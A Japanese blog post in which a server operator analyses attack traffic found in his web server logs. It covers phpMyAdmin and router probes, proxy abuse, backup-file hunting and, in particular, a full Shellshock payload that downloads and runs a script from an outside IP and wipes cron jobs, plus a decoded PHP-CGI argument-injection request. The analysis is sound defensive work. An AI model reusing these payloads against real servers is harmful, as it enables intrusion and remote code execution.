純規の暇人趣味ブログ

広くて浅い知識の湖

WebServerに現れた怪しいアクセスの内容を分析

      2016/10/20    HimaJyun

Webサーバを稼働させ、WWW上にWebページを公開していると、明らかにおかしいアクセスがこんにちはするのは皆さんご存知かと思われます。

とは言え、それらが何を企み、どこをどうしようとしているのかが分からないのは少々不安です。

と言う訳で、いくつかパターンを抽出して調べてみました。

おかしな連中

残念ながら世の中には悪い連中が沢山居るみたいで……

いくつかの悪い奴らをご紹介しようと思います。

古いPHPMyAdminを狙う奴

参考:phpMyAdminを狙った攻撃観察 - ろば電子が詰まっている

209.126.107.196 - - [23/Mar/2015:14:18:46 +0900] "GET /phph/php/ph.php HTTP/1.1" 404 460 "-" "-"
209.126.107.196 - - [23/Mar/2015:14:18:46 +0900] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 486 "-" "-"
209.126.107.196 - - [23/Mar/2015:14:18:46 +0900] "GET /pma/scripts/setup.php HTTP/1.1" 404 472 "-" "-"
209.126.107.196 - - [23/Mar/2015:14:18:47 +0900] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"

良い事なんだか悪い事なんだか、ちょっぴり有名みたいで……

具体的な動き方は以下の通り

  1. 最初にランダムにアクセスしようと試みる(今回の場合は/phph/php/ph.php)
  2. 次に/phpMyAdmin/scripts/setup.phpにアクセスしようとします(存在をスキャン)
  3. その後、考えられる名前候補(pmaとmyadmin)で同じ事をします

こいつ、毎日凄まじい回数やってきやがります。

亜種(?)も存在するらしく、なんだか妙なUserAgentを送ってきたりします。

PHPMyAdminと言うのはMySQLと言うデータべースをブラウザから管理出来るツールです。

PHPと言う名前だけあって、PHPで出来ています、この「scripts/setup.php」にアクセスしようとしてきます。

PHPMyAdmin自体が他人に見せる物では無いのですが「scripts/setup.php」は古いMyAdminにしか無く現在(4.X系)にはこのファイル自体がありません。

つまり、このアタックで被害を受けるのは古いMyAdminを用いている不用心なサーバのみです。

はやくアプデしなさい!!

日本では余り普及していないルータを狙うボット

参考:ハニーポット観察記録(21) at www.morihi-soc.net

こいつは単体(?)でやってきます。

  • 5.32.71.10 "GET /tmUnblock.cgi HTTP/1.1" 400

さて、当たり前ですがtmUnblock.cgiなんてありません。

無いったらないのですが、HTTP/1.1なのにHostヘッダが無いらしく、要求としては破損して居るが為に「HTTP:400 BadRequest(正しく無い要求)」を応答しています。

このBotはLinksysと言うメーカの一部シリーズに報告された脆弱性を狙う様です。

Linksys(リンクシス)はIT関連の製品を取り扱ってるアメリカのメーカで、日本法人は「シスコ・リンクシス株式会社」ですが、既に撤退済みの模様です。(Wikipediaより)

なので、日本国内でこのルータを見かける事はあったとしても、自分で手に入れたり、使う事は滅多にないと思います。

Webサーバをプロキシとして踏み台にし、スパム配信を狙うボット

参考:はかいおうこうむてん - CONNECTメソッドに200?
参考:Denied Access と表示され、接続を拒否される

これがなかなか難しかったです

  • 111.251.50.149 "CONNECT mx0.mail2000.com.tw:25 HTTP/1.0" 200 1155

身に覚えもないtw(台湾)ドメインに、如何にもメールって感じのアドレスで、しかも、ポート25(SMTP:メール)へのCONNECTの送信

どこからどう見ても怪しい上にApacheが、成功(HTTP200)を返してしまっています。

どうやら、スパム屋さんがWeb鯖を踏み台にして、スパム配信を試みている様です。

さて、成功(200)を返してしまっていますが、CONNECTは、Apacheでプロキシ関連のモジュールを読み込まないと利用出来ないはずです。

もちろん、そんな物読み込んだ覚えは無い。

ならば何故に200???と、思い、調べてみると

ApacheのドキュメントルートにCGI(PerlやPHP)を設置していると、プロキシ中継成功の有無に問わずHTTP200を返す(と、言うより失敗してもトップページを表示するから200に見える)らしいです。

確かにサーバールートはindex.phpです。念のため、モジュールを確認しましたが、もちろんプロキシなんてありません

良くわからないので、参考サイトと同じようにテストしてみました。

自分のPC(の仮想環境)のLinuxからtelnetコマンドを使います。

(<-はEnterと仮定)

$ telnet 192.168.X.X 80<-
Trying 192.168.X.X
Connected to 192.168.X.X
Escape character is '^]'.
CONNECT 127.0.0.1:25 HTTP/1.0<-
<-
HTTP/1.1 200 OK
~~割愛~~
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML lang="ja">
<head>
<title>トップページ</title>
~~略~~

あらら?メールポートへのアクセスを要求してるのに成功として帰ってきたのは自サイトのトップページではありませんか

丁度、手元にデザリングが使えるiPhoneがあるので携帯回線を用いて外部から同じことをしてみましょう

$ telnet jyn.jp 80<-
Trying jyn.jp
Connected to 118.243.175.167
Escap character is '^]'.
CONNECT 127.0.0.1:25 HTTP/1.0<-
<-
HTTP/1.1 200 OK
~~割愛~~
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML lang="ja">
<head>
<title>トップページ</title>
~~略~~

外部から発行したtelnetでも同じ結果が返ってきました。

つまりそう言う仕様、もしくはバグの一種でしょう。

試しに、index.phpをindex.htmlに変更して試してみましょう。

まずはローカル環境から

$ telnet 192.168.X.X 80<-
Trying 192.168.X.X
Connected to 192.168.X.X
Escape character is '^]'.
CONNECT 127.0.0.1:25 HTTP/1.0<-
<-
HTTP/1.1 405 Method Not Allowed
~~~略~~~

次にデザリングで外部から

$ telnet jyn.jp 80<-
Trying jyn.jp
Connected to 118.243.175.167
Escap character is '^]'.
CONNECT 127.0.0.1:25 HTTP/1.0<-
<-
HTTP/1.1 405 Method Not Allowed

問題なさそうですね、HTTP200でしたが、心配ありませんでした。
(該当のアクセスがあった方は念のため確認してみて下さい)

ちなみに、亜種も居ます。

  • CONNECT www.alipay.com:443 HTTP/1.1" 301 411

日本のアニメを求めてクラックを試みる外人オタク

参考:/epgrec/へのWebアクセスは何がしたいのかを探る - ろば電子が詰まっている

  • 195.154.11.217 "GET /epgrec/systemSetting.php HTTP/1.1" 404 1363 "Python-urllib/2.7"
  • 195.154.11.217 "GET /animeprogram/index.php HTTP/1.1" 404 1363 "Python-urllib/2.7"

Pythonでurllib(URLを扱うライブラリだと思われ)を用いて実行して居ますね。

狙ったファイルは……epgrec?のシステム設定?、epgrecってなんぞや?

と、言う訳で、調べてみた所、EPGrecはLinux向けテレビ番組録画予約システムで、なんでも、Web経由でテレビ番組を録画出来るんだとか?

これの脆弱性を狙った攻撃のようです。

でもこれ、日本発のソフトで、利用しているユーザもほぼ日本人のみ、しかもLinux向け(世界の個人PCシェア90%はWindows)

普通に考えて、マイナー過ぎるシステムをピンポイントで狙うとは何事か?

と、思いますが、どうやら、脆弱性が多く、それを狙って攻撃するらしいです。

それも、鯖をのっとりとかでは無く、外人の、所謂ダークサイドオタク日本のアニメ番組を求めて実行しているらしいです。

日本人として、それくらいアニメが人気であると言う事は嬉しいんですが……不正アクセス……微妙な気分……(不正アクセス+違法アップロードなんて救いようがねぇ奴も居るらしく……)

で、どうやら自鯖へのアタックもアニメを求めているっぽいですね。

ログの2行目「/animeprogram/index.php」太字の所、落ち着いて読んでみて下さい。

「アニメプログラム」と読み取れますね。指定しているディレクトリ名が「アニメプログラム」になっている。

予想にしか過ぎないけど、この/animeprogram/には録画されたアニメが保存されるのだと思います。

ですが、残念ながら、このサーバはWebサーバ、何をどう間違えても録画用サーバなんかじゃありません。

残念だけど、アニメなんてありませんよ(私はどっちかと言うとゲーム寄りですしね)

BashのShellShockを狙うアタック

31.184.194.114 - - [05/Mar/2015:08:16:38 +0900] "GET HTTP/1.1 HTTP/1.1" 400 392 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\");'"
31.184.194.114 - - [05/Mar/2015:08:16:38 +0900] "GET /phppath/cgi_wrapper HTTP/1.1" 301 468 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\");'"
31.184.194.114 - - [05/Mar/2015:08:16:39 +0900] "GET /phppath/php HTTP/1.1" 301 452 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\");'"
31.184.194.114 - - [05/Mar/2015:08:16:40 +0900] "GET /fcgi-bin/php5.fcgi HTTP/1.1" 301 466 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\");'"
31.184.194.114 - - [05/Mar/2015:08:16:40 +0900] "GET /fcgi-bin/php HTTP/1.1" 301 454 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\");'"
31.184.194.114 - - [05/Mar/2015:08:16:41 +0900] "GET /cgi-bin/php5 HTTP/1.1" 301 454 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\");'"
31.184.194.114 - - [05/Mar/2015:08:16:41 +0900] "GET /cgi-bin/test-cgi HTTP/1.1" 301 462 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\");'"
31.184.194.114 - - [05/Mar/2015:08:16:42 +0900] "GET /cgi-bin/test.cgi HTTP/1.1" 301 462 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\");'"
31.184.194.114 - - [05/Mar/2015:08:16:42 +0900] "GET /cgi-mod/php5.cgi HTTP/1.1" 301 462 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\");'"
31.184.194.114 - - [05/Mar/2015:08:16:43 +0900] "GET /xampp/cgi.cgi HTTP/1.1" 301 456 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\");'"
31.184.194.114 - - [05/Mar/2015:08:16:44 +0900] "GET /cgi-bin/up.cgi HTTP/1.1" 301 458 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\");'"
31.184.194.114 - - [05/Mar/2015:08:16:44 +0900] "GET /fcgi-php/php HTTP/1.1" 301 454 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\");'"
31.184.194.114 - - [05/Mar/2015:08:16:45 +0900] "GET /cgi-bin/cgi.cgi HTTP/1.1" 301 460 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\");'"

しね(ド直球

BashのShellShockを狙った攻撃ですね。

ShellShockで実行しようとしているのは以下の通り。

() { :;};
/usr/bin/perl -e '
print "Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";
system("
  crontab -r;
  killall -9 php perl;
  cd /tmp/ ;
  mkdir gnu-bash-max-races ;
  cd /tmp/gnu-bash-max-races ;
  wget http://64.32.12.152/gnu-bash-max-race ;
  lwp-download http://64.32.12.152/gnu-bash-max-race ;
  fetch http://64.32.12.152/gnu-bash-max-race ;
  curl -O http://64.32.12.152/gnu-bash-max-race ;
  perl gnu-bash-max-race;
  cd /tmp/;
  rm -rf max*
");
'

分かるだけ解説していきましょう。

() { :;};

ShellShockのそれですね。

/usr/bin/perl -e

これでPerlを呼び出し

print "Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";

これでプレーンテキストを偽り(\r\nはいわゆる改行です。)

system()

これでシェルコマンドを実行しようとしています。
内容としては

crontab -r; <- cronを全て削除
killall -9 php perl; <- PHPとPerlのプロセスを全滅させる
cd /tmp/ ; <- /tmp/に移動
mkdir gnu-bash-max-races ; <- gnu-bash-max-races/ディレクトリを作成
cd /tmp/gnu-bash-max-races ; <- gnu-bash-max-races/ディレクトリに移動
wget http://64.32.12.152/gnu-bash-max-race ; <- wgetでダウンロード
lwp-download http://64.32.12.152/gnu-bash-max-race ; <- LWPでダウンロード
fetch http://64.32.12.152/gnu-bash-max-race ; <- fetchでダウンロード
curl -O http://64.32.12.152/gnu-bash-max-race ; <- curlでダウンロード
perl gnu-bash-max-race; <- ダウンロードしたものを実行する
cd /tmp/; <- /tmp/に戻る
rm -rf max* <- ダウンロードしたものを消す

つまり、何が何でも64.32.12.152からgnu-bash-max-racesをダウンロードしたい模様ですね。

どんな面白い物が入ってるのか気になったのでwgetをしてみましたが、既にそこにお宝はありませんでした……

が、当サーバはとっくの昔にShellShockは対策済みのため、無問題です。

URLエンコードでPHPをぶち込んでくる奴

198.154.63.131 - - [26/Feb/2015:05:01:58 +0900] "POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 301 1755 "-" "-"

……嫌がらせでしょうかね?

194.250.119.83 - - [08/Feb/2015:19:11:52 +0900] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 301 1584 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"

URLエンコードされてますね、デコードしてみました

cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -d auto_prepend_file=php://input -n

URLからのインクルードを有効にして、セーフモード切って……うわぁ

最後にinput(標準入力)から受け取った物を使おうとしている辺り、POSTで渡された本文にヤバい物が含まれていると予想

とは言え、これが効いちゃうサーバなんてない気がします。(うちcgi-bin方式じゃないんで、はい)

アーカイブ泥棒

こんな奴も……

107.178.195.151 - - [28/Jun/2016:13:38:09 +0900] "HEAD /web.zip HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) AppEngine-Google; (+http://code.google.com/appengine; appid: s~giuuytrh-13)"
107.178.195.147 - - [28/Jun/2016:13:38:10 +0900] "HEAD /backup.tar.gz HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) AppEngine-Google; (+http://code.google.com/appengine; appid: s~giuuytrh-13)"
107.178.195.143 - - [28/Jun/2016:13:38:10 +0900] "HEAD /backup.zip HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) AppEngine-Google; (+http://code.google.com/appengine; appid: s~giuuytrh-13)"
107.178.195.143 - - [28/Jun/2016:13:38:10 +0900] "HEAD /backup.sql HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) AppEngine-Google; (+http://code.google.com/appengine; appid: s~giuuytrh-13)"
107.178.195.151 - - [28/Jun/2016:13:38:11 +0900] "HEAD /1.sql HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) AppEngine-Google; (+http://code.google.com/appengine; appid: s~giuuytrh-13)"
107.178.195.151 - - [28/Jun/2016:13:38:11 +0900] "HEAD /1.zip HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) AppEngine-Google; (+http://code.google.com/appengine; appid: s~giuuytrh-13)"
107.178.195.143 - - [28/Jun/2016:13:38:11 +0900] "HEAD /1.tar.gz HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) AppEngine-Google; (+http://code.google.com/appengine; appid: s~giuuytrh-13)"
107.178.195.147 - - [28/Jun/2016:13:38:11 +0900] "HEAD /1.tar HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) AppEngine-Google; (+http://code.google.com/appengine; appid: s~giuuytrh-13)"
107.178.195.143 - - [28/Jun/2016:13:38:18 +0900] "HEAD /public.tar.gz HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) AppEngine-Google; (+http://code.google.com/appengine; appid: s~giuuytrh-13)"
107.178.195.143 - - [28/Jun/2016:13:38:18 +0900] "HEAD /public.zip HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) AppEngine-Google; (+http://code.google.com/appengine; appid: s~giuuytrh-13)"
107.178.195.143 - - [28/Jun/2016:13:38:19 +0900] "HEAD /public.rar HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) AppEngine-Google; (+http://code.google.com/appengine; appid: s~giuuytrh-13)"
107.178.195.143 - - [28/Jun/2016:13:38:19 +0900] "HEAD /public_html.tar.gz HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) AppEngine-Google; (+http://code.google.com/appengine; appid: s~giuuytrh-13)"
107.178.195.151 - - [28/Jun/2016:13:38:19 +0900] "HEAD /public_html.zip HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) AppEngine-Google; (+http://code.google.com/appengine; appid: s~giuuytrh-13)"

バックアップのアーカイブ狙いですね。

sqlも狙っている辺り、パスワードをレインボーテーブルで割りたいのか、もしくはこのブログの完全なるクローンを作成したいのだと思われます。

バーカ!!そんな所にバックアップのアーカイブなんておいてるわけねーだろー!!

特筆すべき点はこれのUAが「AppEngine-Google」、すなわちGoogle AppEngineでこんにちはしている点です。

短期間だけ高性能なサーバを借りて(もしくは無料枠を使って)超速で収集、終わったらインスタンスを破棄、みたいなスタンスですかね?(そうすれば安価で素早く大量に手に入れられますからね)

Webから見られる範囲にバックアップのアーカイブを置かないなんて至極当然の事です。

最後に

嫌な世の中ですねぇ……

今回紹介したのはほんの一例です、実際はもっと多彩な攻撃が沢山飛んできます。

殆どが無効なリクエストなので鯖側で拒否してしまうのですが、うっかり脆弱性を突かれる事も無きにしも非ずなのでセキュリティには気を付けて下さい(ShellShockとかああ言うのあるとヤバめ)

 - サーバ運営